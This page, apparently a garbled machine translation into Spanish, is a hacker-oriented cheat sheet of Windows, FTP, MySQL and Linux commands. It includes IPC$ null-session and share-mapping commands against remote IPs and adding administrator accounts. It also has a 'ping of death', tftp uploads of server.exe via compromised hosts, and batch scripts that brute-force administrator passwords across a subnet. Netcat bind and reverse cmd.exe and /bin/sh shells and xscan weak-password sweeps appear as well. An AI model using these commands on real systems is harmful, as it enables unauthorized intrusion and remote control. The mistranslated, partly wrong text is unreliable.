Red de conocimiento informático - Material del sitio web - ¿Qué comando se puede utilizar para ver el destino de los datos de conexión de red en el sistema XP?

¿Qué comando se puede utilizar para ver el destino de los datos de conexión de red en el sistema XP?

Colección completa de miles de comandos de DOS de uso común

-------------------------- - --------------------------------------------------

Autor: Fuente: Hora de publicación: 2005-11-1 16:38:18

----------------- -- ------------------------------------------------ -- -----------

----------------------- --- -----------------------------------------

Diccionario de comandos de DOS.. Colección

net use \\ip\ipc$ " " /user:" " Establecer enlace vacío IPC

net use \\ ip\ipc $ "contraseña" /usuario:"nombre de usuario" Establecer un enlace IPC no vacío

uso neto h: \\ip\c$ "contraseña" /usuario:"nombre de usuario" mapa después de iniciar sesión directamente La otra parte C: Al área local es H:

net use h: \\ip\c$ Después de iniciar sesión, la otra parte C: Al área local es H:

net use \\ip\ipc $ /del Eliminar enlace IPC

net use h: /del Eliminar la asignación de la otra parte al local H:

net usuario nombre de usuario contraseña/agregar Crear usuario

usuario de red invitado /activo:yes Activar usuario invitado

usuario de red Ver qué usuarios

nombre de cuenta de usuario de red para ver los atributos de la cuenta

net localgroup ***istrators Nombre de usuario/agregar Agregue "usuario" al administrador para tener derechos de administrador. Nota: agregue s después de ***istrator para hacerlo plural

net start para ver qué servicios son. habilitado

nombre del servicio net start inicia el servicio (como: net start telnet, net start Schedule)

nombre del servicio net stop detiene un servicio

net; time \\target ip Verifique la hora de la otra parte

net time \\target ip /set Configure la hora de la computadora local para sincronizarla con la hora del host "target IP" Agregue el parámetro /yes para cancelar. el mensaje de confirmación

net view Ver qué recursos compartidos de VPN están habilitados en la LAN local

net view \\ip Ver qué recursos compartidos de VPN están habilitados en la LAN de la otra parte

net config muestra la configuración de red del sistema

p>

el cierre de sesión de red es el beneficio final de la desconexión

el nombre del servicio de pausa de red es pausar un servicio

envío de red ip "mensaje de texto" es para enviar un mensaje a la otra parte

net ver Tipo de conexión de red e información que se utiliza actualmente en la LAN

net share Ver recursos compartidos *** habilitados localmente

participación neta ipc$ Abrir ipc$*** disfrutar

participación neta ipc$ /del eliminar ipc$***disfrutar

participación neta c$ / del eliminar C:***enjoy

usuario neto invitado 12345 usa gu

Después de que el usuario inicie sesión, cambie la contraseña a 12345

contraseña de red para cambiar la contraseña de inicio de sesión del sistema

netstat -a para verificar qué puertos están abiertos, netstat -an < de uso común

netstat -n Verifique el estado de la conexión de red del puerto, netstat -an de uso común

netstat -v verifique el trabajo en curso

netstat -p ejemplo de nombre de protocolo : netstat -p tcq/ip Verifique el uso de un determinado protocolo (verifique el uso del protocolo tcp/ip)

netstat -s Verifique el uso de todos los protocolos en uso

nbtstat -A ip Uno de los otros puertos 136 a 139 Si está activado, puede ver el nombre de usuario del inicio de sesión reciente de la otra parte (el que está antes de 03 es el nombre de usuario) - Nota: el parámetro -A debe estar en mayúscula

tracert - parámetro ruta de seguimiento de IP (o nombre de computadora) (paquete de datos), parámetro: "-w número" se usa para establecer el intervalo de tiempo de espera.

Ping ip (o nombre de dominio) envía datos con un tamaño predeterminado de 32 bytes al otro host Parámetros: "-l [espacio] tamaño del paquete"; "-n número de veces para enviar datos" ; "-t "se refiere a hacer ping todo el tiempo.

ping -t -l 65550 ip ping of death (enviar archivos de más de 64K y hacer ping todo el tiempo se convierte en el ping de la muerte)

ipconfig (winipcfg) para Windows NT y XP (Windows 95 98) Para ver la dirección IP local, ipconfig puede usar el parámetro "/all" para mostrar toda la información de configuración

tlist -t muestra el proceso en una lista de líneas de árbol (es una herramienta adicional para el sistema, que no está instalado de forma predeterminada en la carpeta Soporte/herramientas del directorio de instalación)

kill -F Agregue el parámetro -F al nombre del proceso para forzar el final de un proceso ( es una herramienta adicional para el sistema, que no se instala de forma predeterminada en el soporte del directorio de instalación /carpeta herramientas)

Del -F El nombre del archivo se puede eliminar agregando el parámetro -F. AR, /AH, /AS y /AA representan respectivamente la eliminación de archivos de solo lectura, ocultos y de sistema, archivos de almacenamiento, /A-R, /A-H, /A-S, /A-A significan eliminar archivos que no sean de solo lectura y ocultos. , sistema y archivos de almacenamiento. Por ejemplo, "DEL/AR *.*" significa eliminar todos los archivos de solo lectura en el directorio actual, y "DEL/A-S *.*" significa eliminar todos los archivos en el directorio actual excepto los archivos del sistema

#2 Dos:

del /S /Q directorio o use: rmdir /s /Q directorio /S para eliminar el directorio y todos los subdirectorios y archivos bajo el directorio. Al mismo tiempo, use el parámetro /Q para cancelar la operación de eliminación y elimínela directamente después de que el sistema la confirme.

(Los dos comandos tienen el mismo efecto)

mover letra de unidad\ruta\nombre del archivo a mover ruta para almacenar el archivo movido\nombre del archivo después de mover para mover el archivo, use el parámetro /y para cancelar la confirmación de que existe el mismo archivo en el directorio movido. Simplemente sobrescriba las indicaciones

fc one.txt two.txt > 3st.txt. Compare los dos archivos y envíe las diferencias al archivo 3st.txt. "> " y "> >" son duplicados. El comando dirigido

en el número de identificación inicia una tarea programada registrada

en /delete detiene todas las tareas programadas. Utilice el parámetro /yes para detener. directamente sin confirmación

al número de identificación/eliminar Detener una tarea programada registrada

en Ver todas las tareas programadas

a las \\ip hora nombre del programa (o un comando ) /r Ejecute un determinado programa en el otro lado en un momento determinado y reinicie la computadora

dedo nombre de usuario @host para ver qué usuarios han iniciado sesión recientemente

Telnet ip puerto remoto y servidor de inicio de sesión, el puerto predeterminado es 23

open ip se conecta a IP (un comando después de iniciar sesión en telnet)

telnet Escriba telnet directamente en la máquina local para ingresar al telnet local

copiar ruta\nombre de archivo 1 ruta\nombre de archivo 2 /y Copie el archivo 1 al directorio especificado como archivo 2. Utilice el parámetro /y para cancelar la confirmación de que desea sobrescribir un archivo de directorio existente

copiar c:\srv.exe \ \ip\***$ Copiar el c:\srv.exe local al ***

cppy 1st.jpg/b+2st.txt de la otra parte /a 3st.jpg Copie el contenido de 2st.txt Ocultar en 1st.jpg para generar un nuevo archivo 3st.jpg Nota: El encabezado del archivo 2st.txt debe tener tres filas vacías. Parámetros: /b se refiere al archivo binario. /a se refiere al archivo en formato ASCLL

copiar \\ ip\***$\svv.exe c:\ o:copia\\ip\***$\*.* Copiar el archivo srv. archivo exe (todos los archivos) compartido por la otra parte ***i$*** al local C:

xcopy La dirección de destino del archivo o árbol de directorios que se copiará\nombre del directorio. y árbol de directorios Use el parámetro /Y para sobrescribir el mismo archivo sin preguntar.

tftp -i IP en sí (cuando use una máquina de carne como trampolín, use la IP de la máquina de carne) get server.exe c. :\server.exe Después de iniciar sesión, descargue el server.exe de "IP" al host de destino c:\server.exe Parámetro: -i se refiere a Transmitir en modo binario, como cuando se transmiten archivos exe. Si no se agrega, se transmitirá en modo ASCII (modo de transmisión de archivos de texto)

tftp -i La IP de la otra parte coloca c:\server.exe Después de iniciar sesión, cargue c:\server.exe local en el host

El puerto ftp ip se utiliza para cargar archivos al servidor o realizar operaciones con archivos. El puerto predeterminado es 21. bin se refiere a la transmisión en modo binario (para archivos ejecutables, el valor predeterminado es la transmisión en formato ASCII (para archivos de texto)

la impresión de ruta muestra la ruta IP, que mostrará principalmente la dirección de red, la dirección de red y la subred; máscara Máscara de red., dirección de puerta de enlace Dirección de puerta de enlace, dirección de interfaz Interfaz

arp Ver y procesar caché ARP ARP significa resolución de nombres y es responsable de analizar una IP en una dirección MAC física.

arp -a mostrará toda la información

nombre del programa de inicio o comando /max o /min para abrir una nueva ventana y maximizar (minimizar) ejecutar un programa o comando

mem Verifique la CPU uso

nombre de archivo attrib (nombre de directorio) Ver los atributos de un archivo (directorio)

nombre de archivo attrib-A -R -S -H o +A +R + S + H elimina (agrega) los atributos de archivo, de solo lectura, de sistema y ocultos de un archivo; use + para agregarlo como un determinado atributo

dir Ver archivos, parámetros: /Q muestra de qué sistema están los archivos. y los directorios pertenecen al Usuario, /T:C muestra la hora de creación del archivo, /T:A muestra la última vez que se accedió al archivo, /T:W hora de la última modificación

fecha /t, hora /t utilice este parámetro "FECHA/T", "HORA/T" solo mostrará la fecha y hora actuales sin tener que ingresar una nueva fecha y hora

set Especifique el nombre de la variable de entorno = el carácter que se va a utilizar. asignado a la variable Establecer la variable de entorno

p>

set muestra todas las variables de entorno actuales

set p (u otros caracteres) muestra todas las variables de entorno actuales que comienzan con el carácter p (u otros caracteres) )

pausa Pausa el programa por lotes y muestra: Presione cualquier tecla para continuar....

si realiza procesamiento condicional en el programa por lotes (consulte si el comando y las variables para obtener más instrucciones )

La etiqueta Goto dirige cmd.exe a la línea etiquetada en el programa por lotes (la etiqueta debe ser una línea separada y precedida por dos puntos, por ejemplo: etiqueta ":start")

ruta de llamada\nombre del archivo por lotes Llama a otro programa por lotes desde dentro de un programa por lotes (consulte llamar a /? para obtener más instrucciones)

para Ejecutar un comando específico en cada archivo de un conjunto de archivos (consulte la para comando y variable)

echo on o off activa o desactiva el eco. El uso de echo solo sin parámetros muestra la configuración actual del eco

la información del eco muestra información en la pantalla

.

información de eco >> pass.txt Guarde "información" en el archivo pass.txt

findstr "Hello" aa.txt Busque la cadena hello en el archivo aa.txt

buscar nombre de archivo para buscar un archivo

título nombre del título cambia el nombre del título de la ventana CMD

color valor del color establece el color de primer plano y fondo de la consola cmd 0=negro, 1=azul; , 2= Verde, 3=verde claro, 4=rojo, 5=morado, 6=amarillo, 7=blanco, 8=gris, 9=azul claro, A=verde claro, B=verde claro, C=rojo claro, D= Púrpura claro, E=amarillo claro, F=blanco brillante

Nombre del mensaje Cambie el símbolo del sistema mostrado por cmd.exe (cambie C:\, D:\ a: EntSky\)

#3 Tres:

ver muestra información de la versión en la ventana de DOS

winver abre una ventana para mostrar información de la versión (tamaño de la memoria, versión del sistema, versión del parche, nombre de la computadora )

formatear letra de unidad/FS: escriba formatear disco, escriba: FAT, FAT32, NTFS, ejemplo: Formato D: /FS:NTFS

nombre del directorio md para crear el directorio

reemplazar El directorio donde se reemplazará el archivo fuente reemplaza el archivo

ren el nombre del archivo original, el nuevo nombre del archivo y el nombre del archivo renombrado

árbol muestra el directorio en una estructura de árbol, con parámetros - f enumerará los nombres de los archivos en la carpeta número

tipo nombre de archivo muestra el contenido del archivo de texto

más nombre de archivo muestra el archivo de salida pantalla por pantalla

doskey Para bloquear comando=char

Comando doskey para desbloquear = comando de bloqueo proporcionado para DOS (editar la línea de comando, volver a invocar el comando win2k y crear una macro). Por ejemplo: comando lock dir: doskey dir=entsky (doskey dir=dir no se puede usar desbloquear: doskey dir=

taskmgr abre el administrador de tareas

chkdsk /F D: Verifique el disco D y muestre el informe de estado; agregue el parámetro /f y repare los errores en el disco

tlntadmn telnt service admn, escriba tlntadmn y seleccione 3, luego seleccione 8, puede cambiar el puerto predeterminado del servicio telnet. 23 a cualquier otro puerto

salir sale del programa cmd.exe o del proceso actual. El uso del parámetro /B saldrá del script por lotes actual en lugar de cmd.exe

ruta\. El nombre del archivo ejecutable es ejecutable. El archivo establece una ruta.

cmd inicia una ventana de interpretación de comandos de win2K. Parámetros: /eff, /en cierra y habilita la expansión del comando; para obtener instrucciones más detalladas, consulte cmd /?

regedit /s importa el nombre del archivo de registro al registro; el parámetro /S se refiere a la importación en modo silencioso; , sin ningún mensaje;

regedit /e Nombre del archivo de registro exporta el registro

El parámetro de nombre de archivo cacls muestra o modifica la lista de control de acceso a archivos (ACL), para formato NTFS. Parámetros: /D nombre de usuario: configurado para denegar el acceso a un determinado usuario; /P nombre de usuario: perm reemplaza los derechos de acceso del usuario especificado; /G nombre de usuario: perm otorga derechos de acceso al usuario especificado. lee, W escribe, C cambia (escribe), F controla completamente, por ejemplo: cacls D:\test.txt /D pub establece d:\test.txt para denegar el acceso al usuario pub.

nombre de archivo cacls para ver la lista de permisos de usuario de acceso a archivos

contenido de texto REM para agregar comentarios en el archivo por lotes

netsh para ver o cambiar la red local configuración

#4 Cuatro:

Comando de servicio IIS:

iisreset /reboot Reinicia la computadora win2k (pero aparece un mensaje solicitando que el sistema se reinicie)

iisreset /start o stop inicia (detiene) todos los servicios de Internet

iisreset /restart detiene y reinicia todos los servicios de Internet

iisreset /status muestra el estado de todos los servicios de Internet

iisreset /enable or enable Habilita (deshabilita) el reinicio del servicio de Internet en el sistema local

iisreset /rebootonerror Al iniciar, detener o reiniciar el servicio de Internet, si ocurre un error

>

iisreset /noforce Si el servicio de Internet no se puede detener, el servicio de Internet no se cancelará por la fuerza

iisreset /timeout Val no ha detenido el servicio de Internet cuando se excedió el tiempo (segundos ) se alcanza. Si se especifican los parámetros /rebootonerror, la computadora se reiniciará. El valor predeterminado es 20 segundos para reiniciar, 60 segundos para detener y 0 segundos para reiniciar.

Comando FTP: (los detalles se explican más adelante)

El formato de línea de comando de ftp es:

ftp -v -d -i -n -g[ nombre de host] -v muestra toda la información de respuesta del servidor remoto.

-d usa el modo de depuración.

-n restringe el inicio de sesión automático de ftp, es decir, no utiliza el archivo .netrc.

-g Cancela el nombre del archivo global.

ayuda [comando] o ? [Comando] Ver la descripción del comando

bye or quit finaliza el proceso FTP del host y sale del modo de administración de FTP

pwd enumera el directorio del host remoto actual

. poner o enviar el nombre del archivo local [nombre del archivo cargado en el host] para transferir un archivo local al host remoto

get o recv [nombre del archivo del host remoto] [nombre del archivo descargado al local] desde Transferir un lote de archivos del host remoto al host local

mget [remote-files] Recibir un lote de archivos del host remoto al host local

mput local-files Transferir un lote de archivos al host local Transferir archivos al directorio del host remoto

o ls [directorio-remoto] [archivo-local] enumera los archivos en el directorio del host remoto actual. Si hay archivos locales, escriba. los resultados al archivo local

ascii Configurar para enviar archivos en modo ASCII (valor predeterminado)

bin o image Configurar para enviar archivos en modo binario

bell Cada vez que se completa una transferencia de archivos, aparece un mensaje de alarma

cdup regresa al directorio anterior

cerrar interrumpe la sesión ftp con el servidor remoto (correspondiente a abrir)

abrir host[puerto] establece la conexión del servidor ftp especificado, puede especificar el puerto de conexión

eliminar eliminar archivos en el host remoto

mdelete [remote-files] eliminar un lote de files

mkdir nombre-directorio Crea un directorio en el host remoto

rename [from] [to] Cambia el nombre del archivo en el host remoto

directorio rmdir -name Eliminar el directorio en el host remoto

el estado muestra el estado actual de FTP

el sistema muestra el tipo de sistema del host remoto

usuario nombre de usuario [contraseña] [cuenta] Vuelva a iniciar sesión en el host remoto con otro nombre de usuario Host

abra el host [puerto] Restablezca una nueva conexión

solicite el modo de solicitud interactiva

macdef define comando macro

lcd change El directorio de trabajo actual del host local Si es predeterminado, vaya al directorio HOME del usuario actual

chmod cambia los permisos de archivo del host remoto.

case Cuando esté activado, use el comando MGET Copie los nombres de los archivos a la máquina local y conviértalos todos a letras minúsculas

cd remote-dir ingresa al directorio del host remoto

cdup ingresa al directorio principal del directorio del host remoto

! Ejecute un shell interactivo en la máquina local, salga y regrese al entorno ftp, como !ls*.zip

#5 Cinco:

Comando MYSQL:

mysql -h dirección de host -u nombre de usuario -p contraseña para conectarse a MYSQL si se acaba de instalar MYSQL, el super; El usuario root no tiene contraseña.

(Ejemplo: mysql -h110.110.110.110 -Uroot -P123456

Nota: u y root no necesitan agregar espacios, y lo mismo se aplica a los demás)

salir Salir de MYSQL

mysql*** -u nombre de usuario -p contraseña anterior contraseña nueva contraseña cambiar contraseña

otorgar selección en la base de datos.* a nombre de usuario@inicio de sesión host identificado por \"contraseña\"; Agregar nuevo usuario.

(Nota: a diferencia de lo anterior, los siguientes son comandos en el entorno MYSQL, por lo que van seguidos de un punto y coma como terminador del comando)

muestra la lista de bases de datos. Al principio solo existían dos bases de datos: mysql y test. La biblioteca mysql es muy importante. Contiene información del sistema MYSQL. Cuando cambiamos contraseñas y agregamos nuevos usuarios, en realidad usamos esta biblioteca para las operaciones.

usar mysql;

mostrar tablas; mostrar las tablas de datos en la biblioteca

describir el nombre de la tabla; p> crear base de datos nombre de la base de datos; crear base de datos

usar el nombre de la base de datos;

crear el nombre de la tabla de la tabla (lista de configuración de campo

eliminar el nombre de la base de datos); ;

eliminar el nombre de la tabla; eliminar la base de datos y la tabla

eliminar del nombre de la tabla; borrar los registros en la tabla

seleccionar * del nombre de la tabla; registros en la tabla Registro

mysqldump --opt school>school.bbb Haga una copia de seguridad de la base de datos: (El comando se ejecuta en el directorio \\mysql\\bin de DOS); school al archivo school.bbb, school.bbb es un archivo de texto. Puede elegir cualquier nombre de archivo. Ábralo y encontrará nuevos descubrimientos.

Nuevos comandos bajo sistema win2003 (parte práctica):

apagado /parámetro para apagar o reiniciar el host local o remoto.

Descripción del parámetro: /S apaga el host, /R reinicia el host, /T establece digitalmente el tiempo de retardo, que oscila entre 0 y 180 segundos, /A cancela el arranque, /M //IP especificada remota anfitrión.

Ejemplo: apagado /r /t 0 Reinicia el host local inmediatamente (sin demora)

taskill /parámetro nombre del proceso o pid del proceso Termina una o más tareas y procesos.

Descripción del parámetro: /PID es el pid del proceso que se va a terminar. Puede usar el comando tasklist para obtener el pid de cada proceso, /IM es el nombre del proceso que se va a terminar, /. F es terminar el proceso por la fuerza, /T es terminar el proceso especificado y el proceso hijo que inició.

La lista de tareas muestra los identificadores de proceso (PID) de procesos, servicios y procesos de servicio que se ejecutan actualmente en hosts locales y remotos.

Descripción del parámetro: /M enumera los archivos dll cargados por el proceso actual, /SVC muestra los servicios correspondientes a cada proceso, si no hay ningún parámetro, solo se enumera el proceso actual.

#6 Seis:

Comandos básicos en el sistema Linux: distingue entre mayúsculas y minúsculas

uname muestra información de la versión (igual que la versión win2K)

dir muestra los archivos en el directorio actual, ls -al muestra los archivos ocultos (igual que dir en win2K)

pwd consulta la ubicación del directorio actual

cd cd ..volver a la página anterior Directorio de capas, tenga en cuenta que hay un espacio entre cd y... cd /regresar al directorio raíz.

nombre del archivo cat Ver contenido del archivo

cat >abc.txt Escriba el contenido en el archivo abc.txt.

más nombre de archivo Muestra un archivo de texto página por página.

cp copia archivos

mv mueve archivos

rm nombre de archivo elimina archivos, rm -a nombre de directorio elimina directorios y subdirectorios

directorio mkdir name crea un directorio

rmdir elimina un subdirectorio y no hay documentos en el directorio.

chmod establece los permisos de acceso de archivos o directorios

grep busca cadenas en archivos

diff compara archivos

find Búsqueda de archivos

fecha Fecha y hora actuales

quién Consulta quién está utilizando actualmente la misma máquina que usted y hora y ubicación de inicio de sesión

w Consulta quién está actualmente en la máquina Detallada información

whoami Ver el nombre de tu cuenta

grupos Ver el grupo de alguien

contraseña cambiar contraseña

historial Ver tus comandos pasados

ps muestra el estado del proceso

kill detiene un proceso

gcc Los piratas informáticos suelen utilizarlo para compilar archivos escritos en lenguaje C

los permisos su se convierten a los designados usuarios

telnet IP telnet se conecta al otro host (igual que win2K). Cuando aparece bash$, la conexión es exitosa.

ftp ftp se conecta a un servidor (igual que win2K)

Adjunto: comandos por lotes y variables

1: Formato básico de comandos y variables:

FOR /parameter %variable IN (set) DO comando [command_parameters] %variable: especifique un parámetro reemplazable de una sola letra, como: %i, y especifique una variable con: %%i, y al llamar a Uso de variables: %i%, las variables distinguen entre mayúsculas y minúsculas (%i no es igual a %I).

El procesamiento por lotes puede procesar de %0 a %9***10 variables cada vez, de las cuales %0 tiene como valor predeterminado el nombre del archivo por lotes y %1 tiene como valor predeterminado el que se ingresa al usar este lote. primer valor, de manera similar: %2-%9 se refiere al valor ingresado del 2 al 9, por ejemplo: net use \\ip\ipc$ pass /user:user donde ip es %1, pass es %2, usuario para %3;

(conjunto): especifique uno o un grupo de archivos, puede usar comodines, como: (D:\user.txt) y (1 1 254) (1 -1 254), { " (1 1 254)" El primer "1" se refiere al valor inicial, el segundo "1" se refiere al incremento, y el tercero "254" se refiere al valor final, es decir: de 1 a 254; "(1 -1 254 )" descripción: de 254 a 1 }

Comando: especifique el comando que se ejecutará en el archivo, como por ejemplo: comando net use; si desea ejecutar varios comandos, agregue: & a separe los comandos.

command_parameters: especifique parámetros o interruptores de línea de comando para un comando específico

IN (set): se refiere a tomar el valor en (set); para ejecutar el comando

Parámetros: /L significa usar forma incremental {cuando (set) está en forma incremental} /F significa obtener valores continuamente del archivo hasta que esté terminado {cuando (set) ) es un archivo, como (d:\ pass.txt)}.

Ejemplo de uso:

@echo off

formato de uso de eco: test.bat *.*.* > test.txt

para /L %%G en (1 1 254) haga echo %1.%%G >>test.txt & net use \\%1.%%G /user:***istrator busque "Comando completado exitosamente" >>test.txt

Guardar como test.bat Descripción: Intente establecer una conexión IPC$ con una contraseña de ***istrator vacía para 254 IP en un segmento de red de clase C específico. Si tiene éxito, la IP. existe en test.txt.

/L se refiere a la forma incremental (es decir, de 1-254 o 254-1); los primeros tres dígitos de la IP de entrada: *.*.* es el %1 predeterminado para el procesamiento por lotes; %G es variable (el último dígito de ip); & se usa para separar los dos comandos echo y net use | significa que después de crear ipc$, use buscar en los resultados para ver si hay un mensaje de "comando completado con éxito"; ; %1.% %G es la dirección IP completa (1 1 254) se refiere al valor inicial, la cantidad de crecimiento y el valor final.

@echo off

formato de uso de eco: ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb. exe %1 %%i D:\pass.dic 200

Guardar como: ok.exe Descripción: Después de ingresar una IP, use el archivo de diccionario d:\pass.dic para descifrar d:\user. La contraseña del usuario en dic hasta que se agote el valor del archivo. %%i es el nombre de usuario; %1 es la dirección IP ingresada (predeterminada).

#7 Siete:

2: Formato básico del comando if y las variables:

IF [not] declaración de comando numérico de nivel de error Si el programa se ejecuta y finalmente regresa un valor igual o código de salida mayor que el número especificado y la condición especificada es "verdadera".

Ejemplo: el comando IF errorlevel 0 significa que cuando el valor devuelto después de la ejecución del programa es 0, se ejecutará el comando después de la línea; IF not errorlevel 1 significa que el valor devuelto al final de la ejecución del programa. no es igual a 1, entonces se ejecutará el siguiente comando.

0 significa que fue descubierto y ejecutado exitosamente (verdadero); 1 significa que no fue descubierto ni ejecutado (falso).

IF [not] Cadena 1==Cadena 2 Declaración de comando Si la cadena de texto especificada coincide (es decir: la Cadena 1 es igual a la Cadena 2), se ejecutará el siguiente comando.

Ejemplo: "if "%2%"=="4" goto start" significa: si la segunda variable ingresada es 4, ejecute el siguiente comando (nota: cuando llame a una variable, use % nombre de variable % y agregue " ")

IF [no] existe declaración de comando de nombre de archivo Si el nombre de archivo especificado existe, se ejecutará el siguiente comando.

Ejemplo: "si no nc.exe ir al final" significa: si no se encuentra el archivo nc.exe, salte a la etiqueta ":end".

IF [no] declaración de comando numérico de nivel de error else declaración de comando o IF [no] cadena 1==cadena 2 declaración de comando else declaración de comando o IF [no] existe nombre de archivo declaración de comando else declaración de comando más Arriba: Después de la declaración del comando else, se refiere a: cuando la condición anterior no es verdadera, se refiere al comando después de else. Nota: else debe estar en la misma línea que para ser válido.

Cuando hay un comando del, todo el contenido del comando del debe estar encerrado en < >, porque el comando del solo se puede ejecutar en una línea separada. Después de usar < >, es equivalente a una línea separada, por ejemplo: "si existe test.txt. else echo test.txt.missing", preste atención al "." en el comando

(2) Comandos externos del sistema (todos requieren descarga) herramientas relevantes):

1 , navaja suiza: nc.exe

Descripción del parámetro:

-h Ver información de ayuda

- d Modo en segundo plano

-e prog Redirección del programa, ejecutada tan pronto como se establece la conexión [peligroso]

-i intervalo de retardo de segundos

-l modo de escucha , utilizado para conexiones entrantes

-L modo de monitoreo, continúa monitoreando después de cerrar la conexión, hasta CTR+C

-n dirección IP, el nombre de dominio no se puede usar

-o la película graba la transmisión hexadecimal

p>

-p[espacio]número de puerto local

-r puerto local y remoto aleatorio

- t use interacción Telnet

-u modo UDP

-v salida detallada, use -vv para ser más detallado

-w intervalo de retardo de tiempo de espera digital

-z desactiva la entrada y salida (se usa al barrer anclas)

Uso básico:

nc -nvv 192.168.0.1 80 Conéctese al puerto 80 del 192.168.0.1 host

nc -l - p 80 Abra el puerto TCP local 80 y escuche

nc -nvv -w2 -z 192.168.0.1 80-1024 Barre los puertos 80-1024 de 192.168 .0.1

nc - l -p 5354 -t -e c:winntsystem32cmd.exe Vincula el cmdshell del host remoto al puerto TCP 5354 remoto

nc -t -e c:winntsystem32cmd .exe 192.168.0.2 5354 Enlace el cmdshell del host remoto y conéctese de manera inversa al puerto 5354 de 192.168.0.2

Uso avanzado:

nc -L -p 80 Use 1 como honeypot: abra y monitoree continuamente el puerto 80 hasta CTR +C hasta nc -L -p 80 > c:\log.txt Use 2 como honeypot: abra y escuche el puerto 80 hasta CTR+C, y envíe los resultados a c: \log.txt

nc -L -p 80 < c:\honeyport.txt Usa 3-1 como honeypot: abre y escucha el puerto 80 continuamente hasta CTR+C, y pon c: El contenido en \honeyport.txt se envía a la tubería y también se puede usar para transferir archivos

type.exe c:\honeyport | nc -L -p 80 Use 3-2 como honeypot: la apertura no Supervise el puerto 80 continuamente hasta CTR+C y envíe el contenido en c:\honeyport.txt al canal, que también se puede utilizar para transferir archivos

Usar en esta máquina: nc -l -p Local puerto

Uso: nc -e cmd.exe IP local -p puerto local *win2K

nc -e /bin/sh IP local - p puerto local *linux, conexión inversa unix para atravesar el firewall del otro host

Usar en la máquina local: nc -d -l -p puerto local

en

Usar en el host de la otra parte: nc -vv IP local Puerto local> La ruta y el nombre del archivo para transferir el archivo al host de la otra parte

Observaciones:

|

< o > comando de redirección. "<", por ejemplo: tlntadmn < test.txt significa asignar el contenido de test.txt al comando tlntadmn

@ significa ejecutar el comando después @, pero no se mostrará (ejecución en segundo plano ); por ejemplo: @ dir c:\winnt >> d:\log.txt significa: ejecutar dir en segundo plano y almacenar el resultado en d:\log.txt

La diferencia entre > y > >" significa: sobrescribir; ">>" significa: guardar en (agregar a).

Por ejemplo: @dir c:\winnt >> d:\log.txt y @dir c:\winnt > d:\log.txt Ejecute dos comandos respectivamente para comparar: use >> The. El resultado de la segunda vez se guarda, mientras que el resultado de :> es solo el resultado de la primera vez, porque el resultado de la segunda vez sobrescribe el resultado de la primera.

#8 Ocho:

2. Herramienta de escaneo de anclaje: xscan.exe

Formato básico

xscan -host [-] [Otras opciones] Escanee toda la información del host en el segmento "IP inicial a IP final"

xscan -file [ Otras opciones] Escanee toda la información del host en el ancla "nombre de archivo de la lista de IP del host"

Elementos de detección

-active Compruebe si el host está activo

-os Detecta el tipo de sistema operativo remoto (a través de los protocolos NETBIOS y SNMP)

-port Detecta el estado del puerto de los servicios más utilizados

-ftp Detecta contraseñas débiles de FTP

-pub Detecta permiso de escritura de usuario anónimo del servicio FTP

-pop3 detecta contraseñas débiles del servidor POP3

-smtp detecta vulnerabilidades del servidor SMTP

-sql detecta SQL- Contraseñas débiles del servidor

-smb detecta contraseñas débiles del servidor NT

-iis detecta vulnerabilidades de codificación/decodificación de IIS

-cgi detecta vulnerabilidades CGI

- nasl carga el script de ataque Nessus

-all detecta todos los elementos anteriores

Otras opciones

-i número de adaptador configura el adaptador de red, se puede pasar "- l"Adquisición de parámetros

-l muestra todos los adaptadores de red

-v muestra el progreso del análisis detallado

-p omite los hosts que no responden

-o omite los hosts sin puertos abiertos detectados

-t Número de subprocesos simultáneos, el número de hosts simultáneos especifica el número máximo de subprocesos simultáneos y el número de hosts simultáneos, el valor predeterminado el número es 100,10

-log file name especifica el nombre del archivo del informe de escaneo (sufijo: archivo en formato TXT o HTML)

Ejemplo de uso

xscan -host 192.168.1.1-192.168.255.255 -all -active -p detecta todas las vulnerabilidades de los hosts en el segmento de red 192.168.1.1-192.168.255.255 y omite los hosts que no responden

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o Detecta el estado del puerto estándar de los hosts en el segmento de red 192.168.1.1-192.168.255.255. Para usuarios de contraseñas débiles de NT, el número máximo de subprocesos simultáneos es 150, omitiendo los hosts sin puertos abiertos detectados.

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o Detecta el estado del puerto estándar y las vulnerabilidades CGI de todos los hosts enumerados en el archivo "hostlist.txt". El número de subprocesos simultáneos es 200 y se puede detectar un máximo de 5 máquinas al mismo tiempo. Host, muestra el progreso de detección detallado, omite hosts www.jz5u.com sin detectar puertos abiertos